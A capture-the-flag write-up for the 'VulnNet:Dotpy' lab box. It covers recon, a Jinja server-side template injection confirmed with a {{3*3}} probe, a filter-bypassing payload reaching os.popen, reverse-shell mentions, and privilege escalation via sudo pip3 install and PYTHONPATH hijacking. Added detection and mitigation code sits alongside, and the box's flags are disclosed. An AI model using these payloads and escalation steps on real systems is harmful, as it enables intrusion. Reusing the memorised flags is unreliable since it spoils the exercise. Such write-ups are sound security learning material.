VulnNet:Dotpy — Recon
nmap -sCV 10.10.71.12 -oN nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-25 10:07 IST
Nmap scan report for 10.10.71.12
Host is up (0.85s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.9)
| http-title: VulnNet Entertainment — Login | Discover
|_Requested resource was http://10.10.71.12:8080/login
|_http-server-header: Werkzeug/1.0.1 Python/3.6.9
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.67 seconds
VulnNet:Dotpy — Web Server Enumeration
gobuster dir -u http://10.10.71.12:8080/ -x php,txt,zip,bak -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.71.12:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,zip,bak
[+] Timeout: 10s
===============================================================
2022/05/25 10:31:29 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.71.12:8080/b707c344-9fad-435f-a906-267224919c2b => 403 (Length: 3000). To continue please exclude the status code, the length or use the --wildcard switch
Register page (screenshot)

Login page (screenshot)

The page asks us to log in or register, but I tried navigating to a non-existent page: for every wrong input it returns a 403 error.
1. I thought that maybe this web page is vulnerable to SSTI (server-side template injection).
2. Theory:
========================================
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.
3. I tried some payloads to confirm; I sent requests like these:
http://10.10.247.171:8080/index123

http://10.10.247.171:8080/index{{3*3}}

After checking the response, the vulnerability was confirmed: the page also rendered the result of the expression, i.e. 9.
After reading the HackTricks article, I used the payload from PayloadsAllTheThings that bypasses the most common filters, sending it with Burp Suite.
Bypassing most common filters ('.', '_', '|join', '[', ']', 'mro' and 'base'):
========================================
Payload = {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('#CODE HERE#')|attr('read')()}}
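As an added detection example (not part of the original writeup), the following Python scanner reads Werkzeug's default request-log lines and flags the `{{3*3}}` probe and the `|attr`/`\x5f` bypass payload shown above; the log lines are constructed, and the indicator names are my own.

```python
import re
from urllib.parse import unquote

# Werkzeug's default request log line:
#   CLIENT - - [DD/Mon/YYYY HH:MM:SS] "METHOD PATH PROTO" STATUS -
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Literal \xNN escapes, used above to smuggle "__" past a filter on "_".
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

# One rule per SSTI indicator seen in the probe and the bypass payload.
RULES = {
    "jinja_delimiters": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "attr_filter_chain": re.compile(r"\|\s*attr\s*\("),
    "dunder_access": re.compile(
        r"__(globals|builtins|import|getitem|class|mro|subclasses)__"),
    "os_exec_sink": re.compile(r"\b(popen|system|subprocess)\b"),
}

# Constructed traffic: a normal login, a harmless miss, the {{3*3}} probe and
# the attr/\x5f payload (truncated). Every miss is a 403 on this app, so the
# status code alone cannot separate probes from typos; the path content can.
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2022 10:31:29] "GET /login HTTP/1.1" 200 -
10.0.0.5 - - [25/May/2022 10:31:40] "GET /index123 HTTP/1.1" 403 -
10.0.0.5 - - [25/May/2022 10:31:52] "GET /index%7B%7B3*3%7D%7D HTTP/1.1" 403 -
10.0.0.5 - - [25/May/2022 10:33:01] "GET /%7B%7Brequest%7Cattr(%27application%27)%7Cattr(%27%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%27)%7D%7D HTTP/1.1" 403 -
"""


def scan_line(line: str) -> list:
    """Return the names of the indicators that fire for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    decoded = unquote(unquote(m.group("path")))   # undo (double) percent-encoding
    unescaped = HEX_ESCAPE.sub(lambda h: chr(int(h.group(1), 16)), decoded)
    hits = [name for name, rx in RULES.items() if rx.search(unescaped)]
    if unescaped != decoded:                      # tokens were hidden behind \xNN
        hits.append("hex_escapes")
    return hits


def scan_log(text: str) -> list:
    """Return (client, raw_path, status, indicators) for each request that fires."""
    alerts = []
    for line in text.splitlines():
        hits = scan_line(line)
        if hits:
            m = LOG_RE.match(line)
            alerts.append((m.group("client"), m.group("path"), int(m.group("status")), hits))
    return alerts
```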

We got code execution!
Let's try to get a reverse shell.
My payload is the Python reverse shell, converted to hex to bypass the filter:
Good! We are the web user. Encode the shell to hex so we can run it (the shell and the matching encoding are in a CyberChef recipe), and start netcat.

Got a reverse shell.
TTY Shell Upgrade :-
python -c "import pty;pty.spawn('/bin/bash')"
Horizontal Privilege Escalation :-
web@vulnnet-dotpy:~/shuriken-dotpy$ sudo -l
sudo -l
Matching Defaults entries for web on vulnnet-dotpy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User web may run the following commands on vulnnet-dotpy:
(system-adm) NOPASSWD: /usr/bin/pip3 install *
web@vulnnet-dotpy:~/shuriken-dotpy$
Interesting, we can run pip3 install as user system-adm.
…
Reading the GTFOBins page, I created another reverse shell payload:
sudo -u system-adm /usr/bin/pip3 install /tmp/shell

User Flag :-
THM{91c7547864fa1314a306f82a14cd7fb4}
Privilege Escalation :-
system-adm@vulnnet-dotpy:~$ sudo -l
sudo -l
Matching Defaults entries for system-adm on vulnnet-dotpy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User system-adm may run the following commands on vulnnet-dotpy:
(ALL) SETENV: NOPASSWD: /usr/bin/python3 /opt/backup.py
system-adm@vulnnet-dotpy:~$
This SETENV tag can be exploited using PYTHONPATH hijacking.
So I created a file named zipfile.py, since the backup.py program imports this library; in zipfile.py I added the Python reverse shell, and I set PYTHONPATH to the /dev/shm directory.
Exploit:-
I created another reverse shell payload:-
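As an added example, not the box's backup.py or the author's payload, this Python script reproduces the mechanism with a harmless shadow module (a marker constant instead of a shell) and shows that running the interpreter in isolated mode (-I) makes the PYTHONPATH override ineffective; the stand-in script and shadow module are constructed.

```python
import os
import subprocess
import sys
import tempfile

# Stand-in for /opt/backup.py: it only imports zipfile and reports its origin.
BACKUP_STUB = "import zipfile\nprint(zipfile.__file__)\n"
# Benign shadow module; on the box this is where the payload was placed.
SHADOW_STUB = "HIJACKED = True\n"


def run_backup(isolated: bool) -> dict:
    """Run the stub with PYTHONPATH pointing at a directory that holds a shadow
    zipfile.py and report which module Python actually imported.

    With isolated=True the interpreter gets -I, which ignores PYTHONPATH (and
    the script directory and user site-packages), so the stdlib module wins.
    """
    with tempfile.TemporaryDirectory() as shadow_dir, \
            tempfile.TemporaryDirectory() as script_dir:
        with open(os.path.join(shadow_dir, "zipfile.py"), "w") as f:
            f.write(SHADOW_STUB)
        script = os.path.join(script_dir, "backup.py")
        with open(script, "w") as f:
            f.write(BACKUP_STUB)
        # This is what "sudo PYTHONPATH=/dev/shm python3 /opt/backup.py" hands
        # the interpreter when the sudoers rule carries the SETENV tag.
        env = dict(os.environ, PYTHONPATH=shadow_dir)
        argv = [sys.executable] + (["-I"] if isolated else []) + [script]
        proc = subprocess.run(argv, env=env, capture_output=True, text=True, check=True)
        loaded = os.path.realpath(proc.stdout.strip())
        shadowed = os.path.dirname(loaded) == os.path.realpath(shadow_dir)
        return {"module_path": loaded, "shadowed": shadowed}


if __name__ == "__main__":
    for iso in (False, True):
        r = run_backup(isolated=iso)
        print(f"isolated={iso}: shadowed={r['shadowed']} ({r['module_path']})")
```

Without the SETENV tag, sudo's env_reset drops PYTHONPATH before the script runs, so removing that tag from the rule is the simpler fix.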

Root Flag
THM{734c7c2f0a23a4f590aa8600676021fb}